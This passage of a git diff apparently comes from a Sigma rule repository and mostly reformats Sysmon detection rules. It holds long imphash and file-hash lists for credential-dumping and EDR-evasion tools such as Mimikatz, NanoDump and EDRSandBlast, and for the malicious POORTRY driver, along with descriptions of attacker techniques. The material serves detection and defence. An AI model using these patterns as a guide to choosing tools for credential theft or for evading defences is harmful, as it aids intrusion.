IMPHASH=713C29B396B907ED71A72482759ED757 - - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F - - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E - - IMPHASH=8B114550386E31895DFAB371E741123D - - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 - - IMPHASH=9D68781980370E00E0BD939EE5E6C141 - - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE - - IMPHASH=CB567F9498452721D77A451374955F5F - - IMPHASH=730073214094CD328547BF1F72289752 - - IMPHASH=17B461A082950FC6332228572138B80C - - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 - - IMPHASH=819B19D53CA6736448F9325A85736792 - - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E - - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 - - IMPHASH=0588081AB0E63BA785938467E1B10CCA - - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C - - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 - - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 - - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 - - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF - - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE - - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 - - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 - - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E - - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 - - IMPHASH=3AD59991CCF1D67339B319B15A41B35D - - IMPHASH=FFDD59E0318B85A3E480874D9796D872 - - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 - - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 - - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 - - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 - - IMPHASH=0E2216679CA6E1094D63322E3412D650 - - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB - - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 - - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 - - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 - - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F - - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 - - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 - - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC - - IMPHASH=7D010C6BB6A3726F327F7E239166D127 - - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 - - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F - - IMPHASH=5834ED4291BDEB928270428EBBAF7604 - - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 - - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 - - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 - - IMPHASH=3DE09703C8E79ED2CA3F01074719906B - - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F - - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 - - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 - - IMPHASH=09D278F9DE118EF09163C6140255C690 - - IMPHASH=03866661686829d806989e2fc5a72606 - - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d - - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE - - IMPHASH=19584675D94829987952432E018D5056 - - IMPHASH=330768A4F172E10ACB6287B87289D83B - - IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313 - - IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC - - IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28 - - IMPHASH=96DF3A3731912449521F6F8D183279B1 - - IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46 - - IMPHASH=51791678F351C03A0EB4E2A7B05C6E17 - - IMPHASH=25CE42B079282632708FC846129E98A5 - - IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20 - - IMPHASH=59223B5F52D8799D38E0754855CBDF42 - - IMPHASH=81E75D8F1D276C156653D3D8813E4A43 - - IMPHASH=17244E8B6B8227E57FE709CCAD421420 - - IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4 - - IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C - - IMPHASH=40445337761D80CF465136FAFB1F63E6 - - IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6 + - Imphash: + - bcca3c247b619dcd13c8cdff5f123932 # PetitPotam + - 3a19059bd7688cb88e70005f18efc439 # PetitPotam + - bf6223a49e45d99094406777eb6004ba # PetitPotam + - 0c106686a31bfe2ba931ae1cf6e9dbc6 # Mimikatz + - 0d1447d4b3259b3c2a1d4cfb7ece13c3 # Mimikatz + - 1b0369a1e06271833f78ffa70ffb4eaf # Mimikatz + - 4c1b52a19748428e51b14c278d0f58e3 # Mimikatz + - 4d927a711f77d62cebd4f322cb57ec6f # Mimikatz + - 66ee036df5fc1004d9ed5e9a94a1086a # Mimikatz + - 672b13f4a0b6f27d29065123fe882dfc # Mimikatz + - 6bbd59cea665c4afcc2814c1327ec91f # Mimikatz + - 725bb81dc24214f6ecacc0cfb36ad30d # Mimikatz + - 9528a0e91e28fbb88ad433feabca2456 # Mimikatz + - 9da6d5d77be11712527dcab86df449a3 # Mimikatz + - a6e01bc1ab89f8d91d9eab72032aae88 # Mimikatz + - b24c5eddaea4fe50c6a96a2a133521e4 # Mimikatz + - d21bbc50dcc169d7b4d0f01962793154 # Mimikatz + - fcc251cceae90d22c392215cc9a2d5d6 # Mimikatz + - 23867a89c2b8fc733be6cf5ef902f2d1 # JuicyPotato + - a37ff327f8d48e8a4d2f757e1b6e70bc # JuicyPotato + - f9a28c458284584a93b14216308d31bd # JuicyPotatoNG + - 6118619783fc175bc7ebecff0769b46e # RoguePotato + - 959a83047e80ab68b368fdb3f4c6e4ea # RoguePotato + - 563233bfa169acc7892451f71ad5850a # RoguePotato + - 87575cb7a0e0700eb37f2e3668671a08 # RoguePotato + - 13f08707f759af6003837a150a371ba1 # Pwdump + - 1781f06048a7e58b323f0b9259be798b # Pwdump + - 233f85f2d4bc9d6521a6caae11a1e7f5 # Pwdump + - 24af2584cbf4d60bbe5c6d1b31b3be6d # Pwdump + - 632969ddf6dbf4e0f53424b75e4b91f2 # Pwdump + - 713c29b396b907ed71a72482759ed757 # Pwdump + - 749a7bb1f0b4c4455949c0b2bf7f9e9f # Pwdump + - 8628b2608957a6b0c6330ac3de28ce2e # Pwdump + - 8b114550386e31895dfab371e741123d # Pwdump + - 94cb940a1a6b65bed4d5a8f849ce9793 # PwDumpX + - 9d68781980370e00e0bd939ee5e6c141 # Pwdump + - b18a1401ff8f444056d29450fbc0a6ce # Pwdump + - cb567f9498452721d77a451374955f5f # Pwdump + - 730073214094cd328547bf1f72289752 # Htran + - 17b461a082950fc6332228572138b80c # Cobalt Strike beacons + - dc25ee78e2ef4d36faa0badf1e7461c9 # Cobalt Strike beacons + - 819b19d53ca6736448f9325a85736792 # Cobalt Strike beacons + - 829da329ce140d873b4a8bde2cbfaa7e # Cobalt Strike beacons + - c547f2e66061a8dffb6f5a3ff63c0a74 # PPLDump + - 0588081ab0e63ba785938467e1b10cca # PPLDump + - 0d9ec08bac6c07d9987dfd0f1506587c # NanoDump + - bc129092b71c89b4d4c8cdf8ea590b29 # NanoDump + - 4da924cf622d039d58bce71cdf05d242 # NanoDump + - e7a3a5c377e2d29324093377d7db1c66 # NanoDump + - 9a9dbec5c62f0380b4fa5fd31deffedf # NanoDump + - af8a3976ad71e5d5fdfb67ddb8dadfce # NanoDump + - 0c477898bbf137bbd6f2a54e3b805ff4 # NanoDump + - 0ca9f02b537bcea20d4ea5eb1a9fe338 # NanoDump + - 3ab3655e5a14d4eefc547f4781bf7f9e # NanoDump + - e6f9d5152da699934b30daab206471f6 # NanoDump + - 3ad59991ccf1d67339b319b15a41b35d # NanoDump + - ffdd59e0318b85a3e480874d9796d872 # NanoDump + - 0cf479628d7cc1ea25ec7998a92f5051 # NanoDump + - 07a2d4dcbd6cb2c6a45e6b101f0b6d51 # NanoDump + - d6d0f80386e1380d05cb78e871bc72b1 # NanoDump + - 38d9e015591bbfd4929e0d0f47fa0055 # HandleKatz + - 0e2216679ca6e1094d63322e3412d650 # HandleKatz + - ada161bf41b8e5e9132858cb54cab5fb # DripLoader + - 2a1bc4913cd5ecb0434df07cb675b798 # DripLoader + - 11083e75553baae21dc89ce8f9a195e4 # DripLoader + - a23d29c9e566f2fa8ffbb79267f5df80 # DripLoader + - 4a07f944a83e8a7c2525efa35dd30e2f # CreateMiniDump + - 767637c23bb42cd5d7397cf58b0be688 # UACMe Akagi + - 14c4e4c72ba075e9069ee67f39188ad8 # UACMe Akagi + - 3c782813d4afce07bbfc5a9772acdbdc # UACMe Akagi + - 7d010c6bb6a3726f327f7e239166d127 # UACMe Akagi + - 89159ba4dd04e4ce5559f132a9964eb3 # UACMe Akagi + - 6f33f4a5fc42b8cec7314947bd13f30f # UACMe Akagi + - 5834ed4291bdeb928270428ebbaf7604 # UACMe Akagi + - 5a8a8a43f25485e7ee1b201edcbc7a38 # UACMe Akagi + - dc7d30b90b2d8abf664fbed2b1b59894 # UACMe Akagi + - 41923ea1f824fe63ea5beb84db7a3e74 # UACMe Akagi + - 3de09703c8e79ed2ca3f01074719906b # UACMe Akagi + - a53a02b997935fd8eedcb5f7abab9b9f # WCE + - e96a73c7bf33a464c510ede582318bf2 # WCE + - 32089b8851bbf8bc2d014e9f37288c83 # Sliver Stagers + - 09D278F9DE118EF09163C6140255C690 # Dumpert + - 03866661686829d806989e2fc5a72606 # Dumpert + - e57401fbdadcd4571ff385ab82bd5d6d # Dumpert + - 84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte + - 19584675d94829987952432e018d5056 # SysmonQuiet + - 330768a4f172e10acb6287b87289d83b # ShaprEvtMute Hook + - 885c99ccfbe77d1cbfcb9c4e7c1a3313 # Forkatz + - 22a22bc9e4e0d2f189f1ea01748816ac # PPLKiller + - 7fa30e6bb7e8e8a69155636e50bf1b28 # PPLKiller + - 96df3a3731912449521f6f8d183279b1 # Backstab + - 7e6cf3ff4576581271ac8a313b2aab46 # Backstab + - 51791678f351c03a0eb4e2a7b05c6e17 # Backstab + - 25ce42b079282632708fc846129e98a5 # Forensia + - 021bcca20ba3381b11bdde26b4e62f20 # EDRSandBlast + - 59223b5f52d8799d38e0754855cbdf42 # EDRSandBlast + - 81e75d8f1d276c156653d3d8813e4a43 # EDRSandBlast + - 17244e8b6b8227e57fe709ccad421420 # EDRSandBlast + - 5b76da3acdedc8a5cdf23a798b5936b4 # EDRSandBlast + - cb2b65bb77d995cc1c0e5df1c860133c # EDRSandBlast + - 40445337761d80cf465136fafb1f63e6 # EDRSandBlast + - 8a790f401b29fa87bc1e56f7272b3aa6 # EDRSilencer + - Hash|contains: # Sysmon field hashes contains all types + - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam + - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam + - IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam + - IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6 # Mimikatz + - IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3 # Mimikatz + - IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF # Mimikatz + - IMPHASH=4C1B52A19748428E51B14C278D0F58E3 # Mimikatz + - IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F # Mimikatz + - IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A # Mimikatz + - IMPHASH=672B13F4A0B6F27D29065123FE882DFC # Mimikatz + - IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F # Mimikatz + - IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D # Mimikatz + - IMPHASH=9528A0E91E28FBB88AD433FEABCA2456 # Mimikatz + - IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3 # Mimikatz + - IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88 # Mimikatz + - IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4 # Mimikatz + - IMPHASH=D21BBC50DCC169D7B4D0F01962793154 # Mimikatz + - IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6 # Mimikatz + - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato + - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato + - IMPHASH=F9A28C458284584A93B14216308D31BD # JuicyPotatoNG + - IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato + - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato + - IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato + - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato + - IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump + - IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump + - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump + - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump + - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump + - IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump + - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump + - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump + - IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump + - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX + - IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump + - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump + - IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump + - IMPHASH=730073214094CD328547BF1F72289752 # Htran + - IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons + - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons + - IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons + - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons + - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump + - IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump + - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump + - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump + - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump + - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump + - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump + - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump + - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump + - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump + - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump + - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump + - IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump + - IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump + - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump + - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump + - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump + - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz + - IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz + - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader + - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader + - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader + - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader + - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F # CreateMiniDump + - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 # UACMe Akagi + - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 # UACMe Akagi + - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC # UACMe Akagi + - IMPHASH=7D010C6BB6A3726F327F7E239166D127 # UACMe Akagi + - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 # UACMe Akagi + - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F # UACMe Akagi + - IMPHASH=5834ED4291BDEB928270428EBBAF7604 # UACMe Akagi + - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 # UACMe Akagi + - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 # UACMe Akagi + - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 # UACMe Akagi + - IMPHASH=3DE09703C8E79ED2CA3F01074719906B # UACMe Akagi + - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F # WCE + - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 # WCE + - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 # Sliver Stagers + - IMPHASH=09D278F9DE118EF09163C6140255C690 # Dumpert + - IMPHASH=03866661686829d806989e2fc5a72606 # Dumpert + - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d # Dumpert + - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte + - IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet + - IMPHASH=330768A4F172E10ACB6287B87289D83B # ShaprEvtMute Hook + - IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313 # Forkatz + - IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC # PPLKiller + - IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28 # PPLKiller + - IMPHASH=96DF3A3731912449521F6F8D183279B1 # Backstab + - IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46 # Backstab + - IMPHASH=51791678F351C03A0EB4E2A7B05C6E17 # Backstab + - IMPHASH=25CE42B079282632708FC846129E98A5 # Forensia + - IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20 # EDRSandBlast + - IMPHASH=59223B5F52D8799D38E0754855CBDF42 # EDRSandBlast + - IMPHASH=81E75D8F1D276C156653D3D8813E4A43 # EDRSandBlast + - IMPHASH=17244E8B6B8227E57FE709CCAD421420 # EDRSandBlast + - IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4 # EDRSandBlast + - IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C # EDRSandBlast + - IMPHASH=40445337761D80CF465136FAFB1F63E6 # EDRSandBlast + - IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6 # EDRSilencer condition: create_stream_hash and selection falsepositives: - Unknown diff --git a/sigma/sysmon/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml b/sigma/sysmon/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml index 38844ac37..078a0e580 100644 --- a/sigma/sysmon/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml +++ b/sigma/sysmon/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml @@ -1,8 +1,7 @@ title: Exports Registry Key To an Alternate Data Stream id: 0d7a9363-af70-4e7b-a3b7-1a176b7fbe84 status: test -description: Exports the target Registry key and hides it in the specified alternate - data stream. +description: Exports the target Registry key and hides it in the specified alternate data stream. references: - https://lolbas-project.github.io/lolbas/Binaries/Regedit/ - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f diff --git a/sigma/sysmon/create_stream_hash/create_stream_hash_winget_susp_package_source.yml b/sigma/sysmon/create_stream_hash/create_stream_hash_winget_susp_package_source.yml index f7dcd7e70..ca5d59440 100644 --- a/sigma/sysmon/create_stream_hash/create_stream_hash_winget_susp_package_source.yml +++ b/sigma/sysmon/create_stream_hash/create_stream_hash_winget_susp_package_source.yml @@ -1,8 +1,7 @@ title: Potential Suspicious Winget Package Installation id: a3f5c081-e75b-43a0-9f5b-51f26fe5dba2 status: experimental -description: Detects potential suspicious winget package installation from a suspicious - source. +description: Detects potential suspicious winget package installation from a suspicious source. references: - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget author: Nasreddine Bencherchali (Nextron Systems) @@ -21,6 +20,7 @@ detection: selection: Contents|startswith: '[ZoneTransfer] ZoneId=3' Contents|contains: + # Note: Add any untrusted sources that are custom to your env - ://1 - ://2 - ://3 diff --git a/sigma/sysmon/create_stream_hash/create_stream_hash_zip_tld_download.yml b/sigma/sysmon/create_stream_hash/create_stream_hash_zip_tld_download.yml index abc71ce12..e1cad2667 100644 --- a/sigma/sysmon/create_stream_hash/create_stream_hash_zip_tld_download.yml +++ b/sigma/sysmon/create_stream_hash/create_stream_hash_zip_tld_download.yml @@ -1,8 +1,7 @@ title: Potentially Suspicious File Download From ZIP TLD id: 0bb4bbeb-fe52-4044-b40c-430a04577ebe status: experimental -description: Detects the download of a file with a potentially suspicious extension - from a .zip top level domain. +description: Detects the download of a file with a potentially suspicious extension from a .zip top level domain. references: - https://twitter.com/cyb3rops/status/1659175181695287297 - https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/ @@ -43,7 +42,6 @@ detection: - .zip:Zone condition: create_stream_hash and selection falsepositives: - - Legitimate file downloads from a websites and web services that uses the ".zip" - top level domain. + - Legitimate file downloads from a websites and web services that uses the ".zip" top level domain. level: high ruletype: Sigma diff --git a/sigma/sysmon/deprecated/create_remote_thread_win_susp_remote_thread_target.yml b/sigma/sysmon/deprecated/create_remote_thread_win_susp_remote_thread_target.yml index 3be873e89..94a76ccde 100644 --- a/sigma/sysmon/deprecated/create_remote_thread_win_susp_remote_thread_target.yml +++ b/sigma/sysmon/deprecated/create_remote_thread_win_susp_remote_thread_target.yml @@ -1,17 +1,10 @@ title: Suspicious Remote Thread Target id: f016c716-754a-467f-a39e-63c06f773987 status: deprecated -description: 'Offensive tradecraft is switching away from using APIs like "CreateRemoteThread", - however, this is still largely observed in the wild. - - This rule aims to detect suspicious processes (those we would not expect to behave - in this way like winword.exe or outlook.exe) creating remote threads on other - processes. - - It is a generalistic rule, but it should have a low FP ratio due to the selected - range of processes. - - ' +description: | + Offensive tradecraft is switching away from using APIs like "CreateRemoteThread", however, this is still largely observed in the wild. + This rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes. + It is a generalistic rule, but it should have a low FP ratio due to the selected range of processes. references: - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/ author: Florian Roth (Nextron Systems) @@ -29,9 +22,9 @@ detection: - \spoolsv.exe - \notepad.exe filter: - - SourceImage|endswith: \csrss.exe - - SourceImage|contains: unknown process - - StartFunction: EtwpNotificationThread + - SourceImage|endswith: \csrss.exe + - SourceImage|contains: unknown process + - StartFunction: EtwpNotificationThread condition: create_remote_thread and (selection and not filter) fields: - ComputerName diff --git a/sigma/sysmon/deprecated/driver_load_win_mal_creddumper.yml b/sigma/sysmon/deprecated/driver_load_win_mal_creddumper.yml index 33550df19..28f8ef46c 100644 --- a/sigma/sysmon/deprecated/driver_load_win_mal_creddumper.yml +++ b/sigma/sysmon/deprecated/driver_load_win_mal_creddumper.yml @@ -1,15 +1,13 @@ title: Credential Dumping Tools Service Execution id: df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2 related: - - id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed - type: derived + - id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed + type: derived status: deprecated -description: Detects well-known credential dumping tools execution via service execution - events +description: Detects well-known credential dumping tools execution via service execution events references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment -author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, - oscd.community +author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community date: 2017/03/05 modified: 2023/12/11 tags: diff --git a/sigma/sysmon/deprecated/driver_load_win_mal_poortry_driver.yml b/sigma/sysmon/deprecated/driver_load_win_mal_poortry_driver.yml index 26178dd98..ac2ec4b0c 100644 --- a/sigma/sysmon/deprecated/driver_load_win_mal_poortry_driver.yml +++ b/sigma/sysmon/deprecated/driver_load_win_mal_poortry_driver.yml @@ -1,8 +1,7 @@ title: Usage Of Malicious POORTRY Signed Driver id: 91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6 status: deprecated -description: Detects the load of the signed poortry driver used by UNC3944 as reported - by Mandiant and Sentinel One. +description: Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One. references: - https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware author: Nasreddine Bencherchali (Nextron Systems) @@ -48,27 +47,27 @@ detection: - MD5=ee6b1a79cb6641aa44c762ee90786fe0 - MD5=909f3fc221acbe999483c87d9ead024a selection_hash: - - sha256: - - 0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc - - 9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c - - 8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104 - - d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c - - 05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4 - - c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497 - - sha1: - - 31cc8718894d6e6ce8c132f68b8caaba39b5ba7a - - a804ebec7e341b4d98d9e94f6e4860a55ea1638d - - 6debce728bcff73d9d1d334df0c6b1c3735e295c - - cc65bf60600b64feece5575f21ab89e03a728332 - - 3ef30c95e40a854cc4ded94fc503d0c3dc3e620e - - b2f955b3e6107f831ebe67997f8586d4fe9f3e98 - - md5: - - 10f3679384a03cb487bda9621ceb5f90 - - 04a88f5974caa621cee18f34300fc08a - - 6fcf56f6ca3210ec397e55f727353c4a - - 0f16a43f7989034641fd2de3eb268bf1 - - ee6b1a79cb6641aa44c762ee90786fe0 - - 909f3fc221acbe999483c87d9ead024a + - sha256: + - 0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc + - 9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c + - 8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104 + - d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c + - 05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4 + - c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497 + - sha1: + - 31cc8718894d6e6ce8c132f68b8caaba39b5ba7a + - a804ebec7e341b4d98d9e94f6e4860a55ea1638d + - 6debce728bcff73d9d1d334df0c6b1c3735e295c + - cc65bf60600b64feece5575f21ab89e03a728332 + - 3ef30c95e40a854cc4ded94fc503d0c3dc3e620e + - b2f955b3e6107f831ebe67997f8586d4fe9f3e98 + - md5: + - 10f3679384a03cb487bda9621ceb5f90 + - 04a88f5974caa621cee18f34300fc08a + - 6fcf56f6ca3210ec397e55f727353c4a + - 0f16a43f7989034641fd2de3eb268bf1 + - ee6b1a79cb6641aa44c762ee90786fe0 + - 909f3fc221acbe999483c87d9ead024a condition: driver_load and (1 of selection*) falsepositives: - Legitimate BIOS driver updates (should be rare) diff --git a/sigma/sysmon/deprecated/driver_load_win_powershell_script_installed_as_service.yml b/sigma/sysmon/deprecated/driver_load_win_powershell_script_installed_as_service.yml index 4ec57b1cb..b103e78df 100644 --- a/sigma/sysmon/deprecated/driver_load_win_powershell_script_installed_as_service.yml +++ b/sigma/sysmon/deprecated/driver_load_win_powershell_script_installed_as_service.yml @@ -1,8 +1,8 @@ title: PowerShell Scripts Run by a Services id: 46deb5e1-28c9-4905-b2df-51cdcc9e6073 related: - - id: a2e5019d-a658-4c6a-92bf-7197b54e2cae - type: derived + - id: a2e5019d-a658-4c6a-92bf-7197b54e2cae + type: derived status: deprecated description: Detects powershell script installed as a Service references: diff --git a/sigma/sysmon/deprecated/driver_load_win_vuln_avast_anti_rootkit_driver.yml b/sigma/sysmon/deprecated/driver_load_win_vuln_avast_anti_rootkit_driver.yml index adceab552..00cc50aa4 100644 --- a/sigma/sysmon/deprecated/driver_load_win_vuln_avast_anti_rootkit_driver.yml +++ b/sigma/sysmon/deprecated/driver_load_win_vuln_avast_anti_rootkit_driver.yml @@ -1,8 +1,7 @@ title: Vulnerable AVAST Anti Rootkit Driver Load id: 7c676970-af4f-43c8-80af-ec9b49952852 status: deprecated -description: Detects the load of a signed and vulnerable AVAST Anti Rootkit driver - often used by threat actors or malware for stopping and disabling AV and EDR products +description: Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products references: - https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/ author: Nasreddine Bencherchali (Nextron Systems) @@ -25,14 +24,14 @@ detection: - SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4 - SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1 selection_other: - - md5: a179c4093d05a3e1ee73f6ff07f994aa - - sha1: 5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4 - - sha256: 